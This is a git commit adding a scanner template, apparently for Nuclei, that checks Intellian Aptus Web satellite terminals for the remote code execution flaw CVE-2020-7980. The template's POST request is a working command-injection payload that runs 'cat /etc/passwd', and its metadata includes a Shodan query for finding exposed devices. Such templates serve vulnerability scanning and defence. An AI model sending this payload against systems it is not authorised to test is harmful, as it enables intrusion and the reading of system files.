Merge pull request #4198 from ritikchaddha/patch-38

Create CVE-2020-7980.yaml
2022-04-20 01:55:55 +04:00 · 2022-04-20 01:55:55 +04:00 · 5945cd31cc
parent 857e6e7e4c f1a525907e
commit 5945cd31cc
1 changed files with 33 additions and 0 deletions
--- a/cves/2020/CVE-2020-7980.yaml
+++ b/cves/2020/CVE-2020-7980.yaml
@ -0,0 +1,33 @@
+id: CVE-2020-7980
+
+info:
+  name: Satellian Intellian Aptus Web <= 1.24 RCE
+  author: ritikchaddha
+  severity: critical
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
+  metadata:
+    shodan-query: http.title:"Intellian Aptus Web"
+  tags: satellian,rce,cve,cve2020,intellian,aptus
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Cookie: ctr_t=0; sid=123456789
+
+        {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200